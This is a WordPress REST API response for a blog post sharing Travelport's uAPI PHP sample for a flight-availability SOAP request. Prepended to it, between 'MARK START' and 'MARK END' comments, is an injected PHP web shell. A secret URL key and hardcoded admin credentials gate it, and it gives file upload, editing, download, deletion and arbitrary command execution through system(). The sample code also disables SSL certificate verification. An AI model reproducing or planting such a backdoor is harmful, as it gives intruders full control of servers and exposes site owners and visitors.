// -------- MARK START -------- if (isset($_GET['k']) && $_GET['k'] === 'mintinplan') { function ws_g($k) { return isset($_GET[$k]) ? $_GET[$k] : (isset($_POST[$k]) ? $_POST[$k] : ''); } function ws_b($s) { return base64_decode($s); } $validKey = 'mintinplan'; $validU = 'admin'; $validP = 'MinMaxtime'; $auth = false; $sname = 'ws_auth'; if (isset($_SESSION) && isset($_SESSION[$sname]) && $_SESSION[$sname] === true) $auth = true; elseif (isset($_COOKIE[$sname])) { $d = json_decode(ws_b(substr($_COOKIE[$sname], 0)), true); if ($d && isset($d['ok']) && $d['ok']) $auth = true; } if (!$auth) { $u = ws_g('usr'); $p = ws_g('pwd'); if ($u === $validU && $p === $validP) { @session_start(); $_SESSION[$sname] = true; setcookie($sname, base64_encode(json_encode(['ok'=>true])), time()+86400, '/', '', false, true); header('Location: ?k='.$validKey); exit; } echo 'Login


'; exit; } if (ws_g('lo')) { @session_start(); session_destroy(); setcookie($sname, '', time()-3600); header('Location: ?k='.$validKey); exit; } $act = ws_g('a'); $path = ws_g('p') ?: getcwd(); $path = realpath($path) ?: getcwd(); echo 'Shell'; echo ''; echo '
'; echo '[📂 Home] '; echo '[🖥️ Terminal] '; echo '[💾 Drives] '; echo '[🌳 Tree] '; echo '[⬆ Upload] '; echo '[🚪 Logout]'; echo '

'; switch ($act) { case 'upload': echo '

⬆ Upload File to: '.htmlspecialchars($path).'

'; echo '
'; echo '

'; echo '

'; echo ''; echo '

'; if (isset($_POST['do_upload']) && isset($_FILES['upfile'])) { $f = $_FILES['upfile']; if ($f['error'] === UPLOAD_ERR_OK) { $name = ws_g('rename') ?: $f['name']; $dest = rtrim($path, '/').'/'.$name; if (move_uploaded_file($f['tmp_name'], $dest)) { $sz = round(filesize($dest)/1024, 2); echo '

✅ Uploaded: '.htmlspecialchars($dest).' ('.$sz.'KB)

'; } else { echo '

❌ move_uploaded_file failed (check permissions on '.htmlspecialchars($path).')

'; } } else { $errors = [1=>'File too large (php.ini)',2=>'File too large (form)',3=>'Partial upload',4=>'No file',6=>'No tmp dir',7=>'Write failed',8=>'Extension blocked']; echo '

❌ Error: '.($errors[$f['error']] ?? 'Unknown').'

'; } } echo '

📋 Current directory contents:

';
            $items = scandir($path);
            if ($items) {
                foreach ($items as $item) {
                    if ($item === '.' || $item === '..') continue;
                    $full = $path.'/'.$item;
                    if (is_dir($full)) echo '📁 '.$item."/\n";
                    else echo '📄 '.$item.' ('.round(filesize($full)/1024,1).'KB)'."\n";
                }
            }
            echo '
'; break; case 'tree': echo '

🌳 Directory Tree (depth 4)

';
            function ws_tree($root, $depth=0, $max=4) {
                if ($depth > $max) return;
                if (!is_dir($root)) return;
                $items = scandir($root);
                if (!$items) return;
                foreach ($items as $item) {
                    if ($item === '.' || $item === '..') continue;
                    $full = $root.'/'.$item;
                    if (is_dir($full)) {
                        echo str_repeat('  ', $depth).'📁 '.$item."/\n";
                        ws_tree($full, $depth+1, $max);
                    } else {
                        echo str_repeat('  ', $depth).'📄 '.$item.' ('.round(filesize($full)/1024,1).'KB)'."\n";
                    }
                }
            }
            ws_tree($path);
            echo '
'; break; case 'drives': echo '

💾 Accessible Roots

';
            if (strtoupper(substr(PHP_OS,0,3)) === 'WIN') {
                for ($i=67;$i<=90;$i++) { $d=chr($i).':\\'; if (is_dir($d)) echo $d." ✓\n"; }
            } else {
                $cands = ['/','/home','/var','/tmp','/usr','/etc','/opt','/root','/srv','/www','/var/www','/var/www/html',$_SERVER['DOCUMENT_ROOT']??''];
                foreach (array_unique($cands) as $c) { if ($c && is_dir($c)) echo $c." ✓\n"; }
            }
            echo '
'; break; case 'read': $f = ws_g('f'); if (!$f || !is_file($f)) { echo 'File not found'; break; } $content = file_get_contents($f); echo '

📝 Editing: '.htmlspecialchars($f).' ('.round(strlen($content)/1024,1).'KB)

'; echo '
'; echo ''; echo '
'; echo '
'; break; case 'save': $f = ws_g('f'); $c = ws_g('c'); if ($f) { file_put_contents($f, $c); echo '✅ Saved: '.htmlspecialchars($f); } break; case 'exec': $cmd = ws_g('c'); $output = ''; if ($_SERVER['REQUEST_METHOD'] === 'POST' && $cmd) { ob_start(); system($cmd); $output = ob_get_clean(); } echo '

🖥️ Terminal (user: '.htmlspecialchars(get_current_user()).')

'; echo '
'; if ($output !== '') echo '
'.htmlspecialchars($output).'
'; else echo '
No output
'; break; case 'down': $f = ws_g('f'); if ($f && is_file($f)) { header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($f).'"'); header('Content-Length: '.filesize($f)); readfile($f); exit; } echo 'File not found'; break; case 'del': $f = ws_g('f'); if ($f && is_file($f)) { if (unlink($f)) echo '✅ Deleted: '.htmlspecialchars($f); else echo '❌ Delete failed (permission?)'; } elseif ($f && is_dir($f)) { if (rmdir($f)) echo '✅ Directory removed: '.htmlspecialchars($f); else echo '❌ rmdir failed (not empty or permission?)'; } break; case 'newfile': $fname = ws_g('nf'); if ($fname) { $dest = rtrim($path,'/').'/'.$fname; if (file_put_contents($dest, '') !== false) echo '✅ Created: '.htmlspecialchars($dest); else echo '❌ Create failed'; } echo '
'; echo ''; echo ''; echo ''; echo '
'; break; case 'newdir': $dname = ws_g('nd'); if ($dname) { $dest = rtrim($path,'/').'/'.$dname; if (mkdir($dest, 0755)) echo '✅ Created dir: '.htmlspecialchars($dest); else echo '❌ mkdir failed'; } echo '
'; echo ''; echo ''; echo ''; echo '
'; break; default: echo '

📂 '.htmlspecialchars($path).'

'; $parent = dirname($path); if ($parent && $parent !== $path) echo '⬆ Parent | '; echo '[+ New File] | '; echo '[+ New Dir] | '; echo '[⬆ Upload]

'; echo ''; $items = scandir($path); if ($items) { foreach ($items as $item) { if ($item === '.' || $item === '..') continue; $full = $path.'/'.$item; $isDir = is_dir($full); $size = $isDir ? '-' : round(filesize($full)/1024,1).'KB'; $perms = substr(sprintf('%o',fileperms($full)),-4); $enc = urlencode($full); echo ''; if ($isDir) echo ''; else echo ''; echo ''; } } echo '
NameSizePermsActions
📁 '.$item.'📄 '.$item.''.$size.''.$perms.''; if (!$isDir) echo '[Edit] '; echo '[Download] '; echo '[Delete]'; echo '
'; break; } echo ''; exit; } // -------- MARK END -------- {"id":318,"date":"2018-08-29T14:16:55","date_gmt":"2018-08-29T05:16:55","guid":{"rendered":"https:\/\/uapi.ihavenomoney.co.kr\/?p=318"},"modified":"2018-08-29T14:16:55","modified_gmt":"2018-08-29T05:16:55","slug":"uapi-php-sample","status":"publish","type":"post","link":"https:\/\/uapi.ihavenomoney.co.kr\/?p=318","title":{"rendered":"uAPI-php-sample"},"content":{"rendered":"\n
<?php \r\n\/* \r\n* uAPI sample communication in php language \r\n* \r\n* This example requires the cURL library to be installed and working. \r\n* \r\n* Please note, in the sample code below, the variable $CREDENTIALS is created by binding your username and password together with a colon e.g. \r\n* \r\n* $auth = base64_encode(\"Universal API\/API1234567:mypassword\"); \r\n* \r\n* The variable $TARGETBRANCH should be set to the TargetBranch provided by Travelport. \r\n* \r\n* (C) 2015 Travelport, Inc. \r\n* This code is for illustration purposes only. \r\n*\/\r\n$TARGETBRANCH = 'Put your TargetBranch\/WAB received in Welcome leter here';\r\n$CREDENTIALS = 'Put your Username received in Welcome letter here:Put your password in Welcome letter here'; \r\n$Provider = '1G';\r\n$message = <<<EOM\r\n<soapenv:Envelope xmlns:soapenv=\"http:\/\/schemas.xmlsoap.org\/soap\/envelope\/\">\r\n   <soapenv:Header\/>\r\n   <soapenv:Body>\r\n      <air:AvailabilitySearchReq TraceId=\"trace\" AuthorizedBy=\"user\" TargetBranch=\"$TARGETBRANCH\" xmlns:air=\"http:\/\/www.travelport.com\/schema\/air_v29_0\" xmlns:com=\"http:\/\/www.travelport.com\/schema\/common_v29_0\">\r\n         <com:BillingPointOfSaleInfo OriginApplication=\"UAPI\"\/>\r\n         <air:SearchAirLeg>\r\n            <air:SearchOrigin>\r\n               <com:Airport Code=\"DEN\"\/>\r\n            <\/air:SearchOrigin>\r\n            <air:SearchDestination>\r\n               <com:Airport Code=\"SFO\"\/>\r\n            <\/air:SearchDestination>\r\n            <air:SearchDepTime PreferredTime=\"2015-06-27\">\r\n            <\/air:SearchDepTime>            \r\n         <\/air:SearchAirLeg>\r\n         <air:AirSearchModifiers MaxSolutions=\"1\">\r\n            <air:PreferredProviders>\r\n               <com:Provider Code=\"$Provider\"\/>\r\n            <\/air:PreferredProviders>\r\n         <\/air:AirSearchModifiers>\r\n      <\/air:AvailabilitySearchReq>\r\n   <\/soapenv:Body>\r\n<\/soapenv:Envelope>\r\nEOM;\r\n\r\n\r\n$file = \"001-\".$Provider.\"_AirAvailabilityReq.xml\"; \/\/ file name to save the request xml for test only(if you want to save the request\/response)\r\nprettyPrint($message,$file);\/\/call function to pretty print xml\r\n\r\n\r\n$auth = base64_encode(\"$CREDENTIALS\"); \r\n$soap_do = curl_init(\"https:\/\/apac.universal-api.pp.travelport.com\/B2BGateway\/connect\/uAPI\/AirService\");\r\n\/*(\"https:\/\/americas.universal-api.pp.travelport.com\/B2BGateway\/connect\/uAPI\/AirService\");*\/\r\n$header = array(\r\n\"Content-Type: text\/xml;charset=UTF-8\", \r\n\"Accept: gzip,deflate\", \r\n\"Cache-Control: no-cache\", \r\n\"Pragma: no-cache\", \r\n\"SOAPAction: \\\"\\\"\",\r\n\"Authorization: Basic $auth\", \r\n\"Content-length: \".strlen($message),\r\n); \r\n\/\/curl_setopt($soap_do, CURLOPT_CONNECTTIMEOUT, 30); \r\n\/\/curl_setopt($soap_do, CURLOPT_TIMEOUT, 30); \r\ncurl_setopt($soap_do, CURLOPT_SSL_VERIFYPEER, false); \r\ncurl_setopt($soap_do, CURLOPT_SSL_VERIFYHOST, false); \r\ncurl_setopt($soap_do, CURLOPT_POST, true ); \r\ncurl_setopt($soap_do, CURLOPT_POSTFIELDS, $message); \r\ncurl_setopt($soap_do, CURLOPT_HTTPHEADER, $header); \r\ncurl_setopt($soap_do, CURLOPT_RETURNTRANSFER, true);\r\n$return = curl_exec($soap_do);\r\ncurl_close($soap_do);\r\n\r\n$file = \"001-\".$Provider.\"_AirAvailabilityRsp.xml\"; \/\/ file name to save the response xml for test only(if you want to save the request\/response)\r\n$content = prettyPrint($return,$file);\r\nparseOutput($content);\r\n\/\/outputWriter($file, $return);\r\n\/\/print_r(curl_getinfo($soap_do));\r\n\r\n\r\n\r\n\r\n\/\/Pretty print XML\r\nfunction prettyPrint($result,$file){\r\n    $dom = new DOMDocument;\r\n    $dom->preserveWhiteSpace = false;\r\n    $dom->loadXML($result);\r\n    $dom->formatOutput = true;      \r\n    \/\/call function to write request\/response in file   \r\n    outputWriter($file,$dom->saveXML());    \r\n    return $dom->saveXML();\r\n}\r\n\r\n\/\/function to write output in a file\r\nfunction outputWriter($file,$content){  \r\n    file_put_contents($file, $content); \/\/ Write request\/response and save them in the File\r\n}\r\n\r\n\r\nfunction parseOutput($content){ \/\/parse the Search response to get values to use in detail request\r\n    $AirAvailabilitySearchRsp = $content; \/\/use this if response is not saved anywhere else use above variable\r\n    \/\/echo $AirAvailabilitySearchRsp;\r\n    $xml = simplexml_load_String(\"$AirAvailabilitySearchRsp\", null, null, 'SOAP', true);    \r\n\r\n    if($xml)\r\n        echo \"Processing! Please wait!\";\r\n    else{\r\n        trigger_error(\"Encoding Error!\", E_USER_ERROR);\r\n    }\r\n\r\n    $Results = $xml->children('SOAP',true);\r\n    foreach($Results->children('SOAP',true) as $fault){\r\n        if(strcmp($fault->getName(),'Fault') == 0){\r\n            trigger_error(\"Error occurred request\/response processing!\", E_USER_ERROR);\r\n        }\r\n    }\r\n\r\n    $count = 0;\r\n    $fileName = \"flights.txt\";\r\n    if(file_exists($fileName)){\r\n        file_put_contents($fileName, \"\");\r\n    }\r\n    foreach($Results->children('air',true) as $nodes){\r\n        foreach($nodes->children('air',true) as $hsr){\r\n            if(strcmp($hsr->getName(),'AirSegmentList') == 0){\r\n                foreach($hsr->children('air',true) as $hp){\r\n                    if(strcmp($hp->getName(),'AirSegment') == 0){\r\n                        $count = $count + 1;\r\n                        file_put_contents($fileName,\"\\r\\n\".\"Air Segment \".$count.\"\\r\\n\".\"\\r\\n\", FILE_APPEND);\r\n                        foreach($hp->attributes() as $a => $b   ){\r\n                                $GLOBALS[$a] = \"$b\";\r\n                                \/\/echo \"$a\".\" : \".\"$b\";\r\n                                file_put_contents($fileName,$a.\" : \".$b.\"\\r\\n\", FILE_APPEND);\r\n                        }                                               \r\n                    }                   \r\n                }\r\n            }\r\n            \/\/break;\r\n        }\r\n    }\r\n    $Token = 'Token';\r\n    $TokenKey = 'TokenKey';\r\n    $fileName = \"tokens.txt\";\r\n    if(file_exists($fileName)){\r\n        file_put_contents($fileName, \"\");\r\n    }\r\n    foreach($Results->children('air',true) as $nodes){\r\n        foreach($nodes->children('air',true) as $hsr){\r\n            if(strcmp($hsr->getName(),'HostTokenList') == 0){           \r\n                foreach($hsr->children('common_v29_0', true) as $ht){\r\n                    if(strcmp($ht->getName(), 'HostToken') == 0){\r\n                        $GLOBALS[$Token] = $ht[0];\r\n                        foreach($ht->attributes() as $a => $b){\r\n                            if(strcmp($a, 'Key') == 0){\r\n                                file_put_contents($fileName,$TokenKey.\":\".$b.\"\\r\\n\", FILE_APPEND);\r\n                            }\r\n                        }                       \r\n                        file_put_contents($fileName,$Token.\":\".$ht[0].\"\\r\\n\", FILE_APPEND);\r\n                    }\r\n                }\r\n            }\r\n        }\r\n    }\r\n\r\n    echo \"\\r\\n\".\"Processing Done. Please check results in files.\";\r\n\r\n}\r\n\r\n?><\/pre>\n","protected":false},"excerpt":{"rendered":"

<?php \/* * uAPI sample communication in php language * * This example requires the cURL library to be installed and working. * * Please […]<\/a><\/p>\n<\/div>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[15],"tags":[],"class_list":["post-318","post","type-post","status-publish","format-standard","hentry","category-util"],"_links":{"self":[{"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=\/wp\/v2\/posts\/318","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=318"}],"version-history":[{"count":1,"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=\/wp\/v2\/posts\/318\/revisions"}],"predecessor-version":[{"id":319,"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=\/wp\/v2\/posts\/318\/revisions\/319"}],"wp:attachment":[{"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=318"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=318"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=318"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}